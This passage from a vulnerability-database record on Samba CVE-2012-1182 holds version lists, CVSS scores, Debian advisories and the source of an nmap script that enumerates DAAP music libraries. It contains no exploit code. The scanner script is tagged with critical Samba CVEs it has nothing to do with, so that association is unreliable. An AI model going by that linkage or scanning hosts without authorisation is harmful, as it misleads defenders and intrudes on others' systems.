"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:samba:samba:3.3.12", "cpe:/a:samba:samba:3.4.12", "cpe:/a:samba:samba:3.3.10", "cpe:/a:samba:samba:3.0.12", "cpe:/a:samba:samba:3.3.4", "cpe:/a:samba:samba:3.0.9", "cpe:/a:samba:samba:3.3.9", "cpe:/a:samba:samba:3.4.6", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:3.3.15", "cpe:/a:samba:samba:3.0.31", "cpe:/a:samba:samba:3.3.2", "cpe:/a:samba:samba:3.2.6", "cpe:/a:samba:samba:3.0.23d", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:3.4.3", "cpe:/a:samba:samba:3.2.13", "cpe:/a:samba:samba:3.3.8", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:3.0.6", "cpe:/a:samba:samba:3.4.7", "cpe:/a:samba:samba:3.2.14", "cpe:/a:samba:samba:3.2.11", "cpe:/a:samba:samba:3.0.37", "cpe:/a:samba:samba:3.4.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.0.26", "cpe:/a:samba:samba:3.0.14a", "cpe:/a:samba:samba:3.0.28", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:3.0.25b", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.13", "cpe:/a:samba:samba:3.4.11", "cpe:/a:samba:samba:3.2.9", "cpe:/a:samba:samba:3.0.24", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.0.25", "cpe:/a:samba:samba:3.2.7", "cpe:/a:samba:samba:3.0.20a", "cpe:/a:samba:samba:3.0.21a", "cpe:/a:samba:samba:3.0.18", "cpe:/a:samba:samba:3.2.0", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.2.5", "cpe:/a:samba:samba:3.0.23c", "cpe:/a:samba:samba:3.0.32", "cpe:/a:samba:samba:3.4.2", "cpe:/a:samba:samba:3.0.25c", "cpe:/a:samba:samba:3.0.26a", "cpe:/a:samba:samba:3.0.8", "cpe:/a:samba:samba:3.0.20b", "cpe:/a:samba:samba:3.2.2", "cpe:/a:samba:samba:3.4.15", "cpe:/a:samba:samba:3.3.1", "cpe:/a:samba:samba:3.0.11", "cpe:/a:samba:samba:3.2.15", "cpe:/a:samba:samba:3.2.3", "cpe:/a:samba:samba:3.0.15", "cpe:/a:samba:samba:3.0.7", 
"cpe:/a:samba:samba:3.4.5", "cpe:/a:samba:samba:3.0.20", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:3.0.23", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:3.3.16", "cpe:/a:samba:samba:3.0.23a", "cpe:/a:samba:samba:3.0.33", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.0.5", "cpe:/a:samba:samba:3.3.6", "cpe:/a:samba:samba:3.4.8", "cpe:/a:samba:samba:3.0.4", "cpe:/a:samba:samba:3.0.27", "cpe:/a:samba:samba:3.2.10", "cpe:/a:samba:samba:3.4.4", "cpe:/a:samba:samba:3.0.21b", "cpe:/a:samba:samba:3.3.7", "cpe:/a:samba:samba:3.0.25a", "cpe:/a:samba:samba:3.0.10", "cpe:/a:samba:samba:3.3.5", "cpe:/a:samba:samba:3.0.19", "cpe:/a:samba:samba:3.4.14", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.17", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:3.0.35", "cpe:/a:samba:samba:3.2.12", "cpe:/a:samba:samba:3.1.0", "cpe:/a:samba:samba:3.0.36", "cpe:/a:samba:samba:3.0.21", "cpe:/a:samba:samba:3.3.11", "cpe:/a:samba:samba:3.2.8", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:3.2.4", "cpe:/a:samba:samba:3.0.34", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.0.2a", "cpe:/a:samba:samba:3.0.22", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.14", "cpe:/a:samba:samba:3.0.16", "cpe:/a:samba:samba:3.4.9", "cpe:/a:samba:samba:3.4.10", "cpe:/a:samba:samba:3.0.30", "cpe:/a:samba:samba:3.3.3", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:3.0.23b", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.3.0", "cpe:/a:samba:samba:3.4.1", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.3.13", "cpe:/a:samba:samba:3.2.1", "cpe:/a:samba:samba:3.3.14", "cpe:/a:samba:samba:3.4.0", "cpe:/a:samba:samba:3.0.21c", "cpe:/a:samba:samba:3.0.29"], "id": "CVE-2012-1182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:a:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:d:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23d:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:3.0.14a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.9:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2021-10-21T23:58:48", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2450-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 12, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nVulnerability : privilege escalation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1182\nDebian Bug : 668309\n\nIt was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": 
"2012-04-12T20:29:01", "type": "debian", "title": "[SECURITY] [DSA 2450-1] samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-12T20:29:01", "id": "DEBIAN:DSA-2450-1:77F45", "href": "https://lists.debian.org/debian-security-announce/2012/msg00080.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T20:17:56", "description": "I uploaded new packages for samba which fixed the following security problem:\n\nCVE-2012-1182\n PIDL based autogenerated code allows overwriting beyond of allocated\n array.\n\nFor the squeeze-backports distribution the problems have been fixed in\nversion 2:3.6.4-1~bpo60+1.\n\n-- \n\n\n\nAttachment:\nsignature.asc\nDescription: Digital signature\n", "cvss3": {}, "published": "2012-04-14T08:51:02", "type": "debian", "title": "[BSA-070] Security Update for samba", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T08:51:02", "id": "DEBIAN:BSA-070:68853", "href": 
"https://lists.debian.org/debian-backports-announce/2012/04/msg00000.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-05-13T07:37:45", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "cvss3": {}, "published": "2012-04-10T21:55:00", "type": "debiancve", "title": "CVE-2012-1182", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T21:55:00", "id": "DEBIANCVE:CVE-2012-1182", "href": "https://security-tracker.debian.org/tracker/CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2022-02-15T21:46:14", "description": "Retrieves a list of music from a DAAP server. The list includes artist names and album and song titles. \n\nOutput will be capped to 100 items if not otherwise specified in the `daap_item_limit` script argument. A `daap_item_limit` below zero outputs the complete contents of the DAAP library. \n\nBased on documentation found here: <http://www.tapjam.net/daap/>.\n\n## Script Arguments \n\n#### daap_item_limit \n\nChanges the output limit from 100 songs. 
If set to a negative value, no limit is enforced.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV --script=daap-get-library <target>\n\n## Script Output \n \n \n | daap-get-library:\n | BUBBA|TWO\n | Fever Ray\n | Fever Ray (Deluxe Edition)\n | Concrete Walls\n | I'm Not Done\n | Here Before\n | Now's The Only Time I Know\n | Stranger Than Kindness\n | Dry And Dusty\n | Keep The Streets Empty For Me\n | Triangle Walks\n | If I Had A Heart\n | Seven\n | When I Grow Up\n |_ Coconut\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-25T23:51:44", "type": "nmap", "title": "daap-get-library NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:00", "id": "NMAP:DAAP-GET-LIBRARY.NSE", "href": "https://nmap.org/nsedoc/scripts/daap-get-library.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves a list of music from a DAAP server. The list includes artist\nnames and album and song titles.\n\nOutput will be capped to 100 items if not otherwise specified in the\n<code>daap_item_limit</code> script argument. A\n<code>daap_item_limit</code> below zero outputs the complete contents of\nthe DAAP library.\n\nBased on documentation found here:\nhttp://www.tapjam.net/daap/.\n]]\n\n---\n-- @args daap_item_limit Changes the output limit from 100 songs. 
If set to a negative value, no limit is enforced.\n--\n-- @output\n-- | daap-get-library:\n-- | BUBBA|TWO\n-- | Fever Ray\n-- | Fever Ray (Deluxe Edition)\n-- | Concrete Walls\n-- | I'm Not Done\n-- | Here Before\n-- | Now's The Only Time I Know\n-- | Stranger Than Kindness\n-- | Dry And Dusty\n-- | Keep The Streets Empty For Me\n-- | Triangle Walks\n-- | If I Had A Heart\n-- | Seven\n-- | When I Grow Up\n-- |_ Coconut\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\n-- Version 0.2\n-- Created 01/14/2010 - v0.1 - created by Patrik Karlsson\n-- Revised 01/23/2010 - v0.2 - changed to port_or_service, added link to documentation, limited output to 100 songs or to daap_item_limit script argument.\n\nportrule = shortport.port_or_service(3689, \"daap\")\n\n--- Gets the name of the library from the server\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @return string containing the name of the library\nfunction getLibraryName( host, port )\n local libname, pos\n local url = \"daap://\" .. host.ip .. 
\"/server-info\"\n local response = http.get( host, port, url, nil, nil, nil)\n\n if response == nil or response.body == nil or response.body==\"\" then\n return\n end\n\n pos = string.find(response.body, \"minm\")\n\n if pos > 0 then\n pos = pos + 4\n libname, pos = string.unpack( \">s4\", response.body, pos )\n end\n\n return libname\nend\n\n--- Reads the first item value specified by name\n--\n-- @param data string containing the unparsed item\n-- @param name string containing the name of the value to read\n-- @return number\nlocal function getAttributeAsInt( data, name )\n\n local pos = string.find(data, name)\n local attrib\n\n if pos and pos > 0 then\n pos = pos + 4\n local len\n len, pos = string.unpack( \">I4\", data, pos )\n\n if ( len ~= 4 ) then\n stdnse.debug1(\"Unexpected length returned: %d\", len )\n return\n end\n\n attrib, pos = string.unpack( \">I4\", data, pos )\n end\n\n return attrib\n\nend\n\n--- Gets a session identity from the server\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @return number containing the session identity received from the server\nfunction getSessionId( host, port )\n\n local sessionid\n local response = http.get( host, port, \"/login\", nil, nil, nil )\n\n if response ~= nil then\n sessionid = getAttributeAsInt( response.body, \"mlid\")\n end\n\n return sessionid\nend\n\n--- Gets the revision number for the library\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @param sessionid number containing session identifier from <code>getSessionId</code>\n-- @return number containing the revision number for the library\nfunction getRevisionNumber( host, port, sessionid )\n local url = \"/update?session-id=\" .. sessionid .. 
\"&revision-number=1\"\n local revision\n local response = http.get( host, port, url, nil, nil, nil )\n\n if response ~= nil then\n revision = getAttributeAsInt( response.body, \"musr\")\n end\n\n return revision\nend\n\n--- Gets the database identity for the library\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @param sessionid number containing session identifier from <code>getSessionId</code>\n-- @param revid number containing the revision id as retrieved from <code>getRevisionNumber</code>\nfunction getDatabaseId( host, port, sessionid, revid )\n local url = \"/databases?session-id=\" .. sessionid .. \"&revision-number=\" .. revid\n local response = http.get( host, port, url, nil, nil, nil )\n local miid\n\n if response ~= nil then\n miid = getAttributeAsInt( response.body, \"miid\")\n end\n\n return miid\nend\n\n--- Gets a string item type from data\n--\n-- @param data string starting with the 4-bytes of length\n-- @param pos number containing offset into data\n-- @return pos number containing new position after reading string\n-- @return value string containing the string item that was read\nlocal function getStringItem( data, pos )\n local item, pos = string.unpack(\">s4\", data, pos)\n return pos, item\nend\n\nlocal itemFetcher = {}\n\nitemFetcher[\"mikd\"] = function( data, pos ) return getStringItem( data, pos ) end\nitemFetcher[\"miid\"] = itemFetcher[\"mikd\"]\nitemFetcher[\"minm\"] = itemFetcher[\"mikd\"]\nitemFetcher[\"asal\"] = itemFetcher[\"mikd\"]\nitemFetcher[\"asar\"] = itemFetcher[\"mikd\"]\n\n--- Parses a single item (mlit)\n--\n-- @param data string containing the unparsed item starting at the first available tag\n-- @param len number containing the length of the item\n-- @return item table containing <code>mikd</code>, <code>miid</code>, <code>minm</code>,\n-- <code>asal</code> and <code>asar</code> when available\nparseItem = function( data, len )\n\n local pos, name, value 
= 1, nil, nil\n local item = {}\n\n while( len - pos > 0 ) do\n name, pos = string.unpack( \"c4\", data, pos )\n\n if itemFetcher[name] then\n pos, item[name] = itemFetcher[name](data, pos )\n else\n stdnse.debug1(\"No itemfetcher for: %s\", name)\n break\n end\n\n end\n\n return item\n\nend\n\n--- Request and process all music items\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @param sessionid number containing session identifier from <code>getSessionId</code>\n-- @param dbid number containing database id from <code>getDatabaseId</code>\n-- @param limit number containing the maximum amount of songs to return\n-- @return table containing the following structure [artist][album][songs]\nfunction getItems( host, port, sessionid, revid, dbid, limit )\n local meta = \"dmap.itemid,dmap.itemname,dmap.itemkind,daap.songalbum,daap.songartist\"\n local url = \"/databases/\" .. dbid .. \"/items?type=music&meta=\" .. meta .. \"&session-id=\" .. sessionid .. \"&revision-number=\" .. revid\n local response = http.get( host, port, url, nil, nil, nil )\n local item, data, pos, len\n local items = {}\n local limit = limit or -1\n\n if response == nil then\n return\n end\n\n -- get our position to the list of items\n pos = string.find(response.body, \"mlcl\")\n pos = pos + 4\n\n while ( pos > 0 and pos + 8 < response.body:len() ) do\n\n -- find the next single item\n pos = string.find(response.body, \"mlit\", pos)\n pos = pos + 4\n\n len, pos = string.unpack( \">I4\", response.body, pos )\n\n if ( pos < response.body:len() and pos + len < response.body:len() ) then\n data, pos = string.unpack( \"c\" .. 
